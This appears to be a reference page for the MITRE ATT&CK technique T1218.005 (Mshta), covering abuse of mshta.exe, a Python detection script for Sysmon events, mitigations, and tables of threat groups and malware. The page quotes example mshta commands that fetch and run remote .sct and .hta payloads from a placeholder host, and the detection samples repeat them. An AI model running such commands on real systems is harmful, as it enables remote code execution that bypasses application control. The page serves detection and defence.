Description
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code. (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: `mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))`
They may also be executed directly from URLs: `mshta http[:]//webserver/payload[.]hta`
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
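The invocation patterns above (inline `vbscript:` script, remote URL, `.hta` file) and the renamed-binary variant noted in the threat group table are the observables a defender can key on. The following is an added detection example, not part of the ATT&CK page: it runs over constructed Sysmon-style process-creation events (field names `Image`, `OriginalFileName`, `CommandLine`; all paths and hosts are made up) and flags mshta launches with script-protocol or URL arguments, HTA file arguments, and copies of mshta.exe running under another name.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (Event ID 1 fields); the paths
# and hosts are invented for this example and are not from any real incident.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": 'mshta vbscript:Close(Execute("GetObject(""script:https://example.invalid/payload.sct"")"))'},
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": "mshta http://example.invalid/payload.hta"},
    # Renamed copy of mshta.exe: the PE version resource still reports mshta.exe.
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": r"svchost.exe C:\Users\Public\update.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\config.hta"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe notes.txt"},
]

# Inline script protocol handlers, remote URLs and scriptlet files on the command line.
SCRIPT_OR_URL = re.compile(r"(vbscript:|javascript:|https?://|\.sct\b)", re.IGNORECASE)
HTA_FILE = re.compile(r"\.hta\b", re.IGNORECASE)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons this event looks like mshta abuse (empty list = not flagged)."""
    image_name = event["Image"].rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    if image_name != "mshta.exe" and original != "mshta.exe":
        return []
    reasons: List[str] = []
    if original == "mshta.exe" and image_name != "mshta.exe":
        reasons.append("renamed mshta.exe (OriginalFileName mismatch)")
    cmd = event["CommandLine"]
    match = SCRIPT_OR_URL.search(cmd)
    if match:
        reasons.append(f"script/URL argument: {match.group(1).lower()}")
    if HTA_FILE.search(cmd):
        reasons.append("HTA file argument")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run classify() over a batch and keep only flagged (command line, reasons) pairs."""
    alerts = []
    for event in events:
        reasons = classify(event)
        if reasons:
            alerts.append((event["CommandLine"], reasons))
    return alerts


if __name__ == "__main__":
    for cmd, reasons in scan(SAMPLE_EVENTS):
        print(f"ALERT {cmd!r}: {'; '.join(reasons)}")
```

Even a local `.hta` launched from a trusted path is reported, since the M1042 mitigation below notes mshta.exe is rarely needed at all; tune that branch per environment rather than suppressing it globally.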
Platforms
Mitigations (2)
Execution Prevention (M1038)
Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the mshta.exe application and to prevent abuse.(Citation: Microsoft
Disable or Remove Feature or Program (M1042)
Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.
Threat Groups (17)
| ID | Group | Context |
|---|---|---|
| G0121 | Sidewinder | [Sidewinder](https://attack.mitre.org/groups/G0121) has used <code>mshta.exe</code> to execute malicious payloads.(Citation: Rewterz Sidewinder APT Ap... |
| G0032 | Lazarus Group | [Lazarus Group](https://attack.mitre.org/groups/G0032) has used <code>mshta.exe</code> to execute HTML pages downloaded by initial access documents.(C... |
| G0069 | MuddyWater | [MuddyWater](https://attack.mitre.org/groups/G0069) has used mshta.exe to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload an... |
| G0129 | Mustang Panda | [Mustang Panda](https://attack.mitre.org/groups/G0129) has used mshta.exe to launch collection scripts.(Citation: Secureworks BRONZE PRESIDENT Decembe... |
| G0140 | LazyScripter | [LazyScripter](https://attack.mitre.org/groups/G0140) has used `mshta.exe` to execute [Koadic](https://attack.mitre.org/software/S0250) stagers.(Citat... |
| G1018 | TA2541 | [TA2541](https://attack.mitre.org/groups/G1018) has used `mshta` to execute scripts including VBS.(Citation: Cisco Operation Layover September 2021) |
| G0082 | APT38 | [APT38](https://attack.mitre.org/groups/G0082) has used a renamed version of `mshta.exe` to execute malicious HTML files.(Citation: 1 - appv) |
| G0100 | Inception | [Inception](https://attack.mitre.org/groups/G0100) has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 20... |
| G0094 | Kimsuky | [Kimsuky](https://attack.mitre.org/groups/G0094) has used mshta.exe to run malicious scripts on the system.(Citation: EST Kimsuky April 2019)(Citation... |
| G0046 | FIN7 | [FIN7](https://attack.mitre.org/groups/G0046) has used mshta.exe to execute VBScript to execute malicious code on victim systems.(Citation: FireEye FI... |
| G1006 | Earth Lusca | [Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro Ear... |
| G0050 | APT32 | [APT32](https://attack.mitre.org/groups/G0050) has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason C... |
| G0016 | APT29 | [APT29](https://attack.mitre.org/groups/G0016) has used `mshta` to execute malicious scripts on a compromised host.(Citation: ESET T3 Threat Report 202... |
| G0142 | Confucius | [Confucius](https://attack.mitre.org/groups/G0142) has used mshta.exe to execute malicious VBScript.(Citation: TrendMicro Confucius APT Feb 2018) |
| G0127 | TA551 | [TA551](https://attack.mitre.org/groups/G0127) has used mshta.exe to execute malicious payloads.(Citation: Unit 42 TA551 Jan 2021) |
| G1008 | SideCopy | [SideCopy](https://attack.mitre.org/groups/G1008) has utilized `mshta.exe` to execute a malicious hta file.(Citation: MalwareBytes SideCopy Dec 2021) |
| G0047 | Gamaredon Group | [Gamaredon Group](https://attack.mitre.org/groups/G0047) has used `mshta.exe` to execute malicious files.(Citation: Symantec Shuckworm January 2022)(C... |
Associated Software (11)
| ID | Name | Type | Context |
|---|---|---|---|
| S0250 | Koadic | Tool | [Koadic](https://attack.mitre.org/software/S0250) can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Git... |
| S0341 | Xbash | Malware | [Xbash](https://attack.mitre.org/software/S0341) can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018) |
| S0414 | BabyShark | Malware | [BabyShark](https://attack.mitre.org/software/S0414) has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20... |
| S0223 | POWERSTATS | Malware | [POWERSTATS](https://attack.mitre.org/software/S0223) can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWa... |
| S1213 | Lumma Stealer | Malware | [Lumma Stealer](https://attack.mitre.org/software/S1213) has used mshta.exe to execute additional content.(Citation: Qualys LummaStealer 2024)(Citatio... |
| S0455 | Metamorfo | Malware | [Metamorfo](https://attack.mitre.org/software/S0455) has used mshta.exe to execute an HTA payload.(Citation: FireEye Metamorfo Apr 2018) |
| S0379 | Revenge RAT | Malware | [Revenge RAT](https://attack.mitre.org/software/S0379) uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019) |
| S0228 | NanHaiShu | Malware | [NanHaiShu](https://attack.mitre.org/software/S0228) uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016) |
| S0589 | Sibot | Malware | [Sibot](https://attack.mitre.org/software/S0589) has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021) |
| S1155 | Covenant | Tool | [Covenant](https://attack.mitre.org/software/S1155) can create HTA files to install Grunt listeners.(Citation: Github Covenant) |
| S0147 | Pteranodon | Malware | [Pteranodon](https://attack.mitre.org/software/S0147) can use mshta.exe to execute an HTA file hosted on a remote server.(Citation: Symantec Shuckworm... |
References
- Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.
- Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
- Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.
- Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
- LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.
- Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.
- Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.
Frequently Asked Questions
What is T1218.005 (Mshta)?
T1218.005 is a MITRE ATT&CK technique named 'Mshta'. It belongs to the Stealth tactic(s). Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats levera...
How can T1218.005 be detected?
Detection of T1218.005 (Mshta) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1218.005?
There are 2 documented mitigations for T1218.005. Key mitigations include: Execution Prevention, Disable or Remove Feature or Program.
Which threat groups use T1218.005?
Known threat groups using T1218.005 include: Sidewinder, Lazarus Group, MuddyWater, Mustang Panda, LazyScripter, TA2541, APT38, Inception.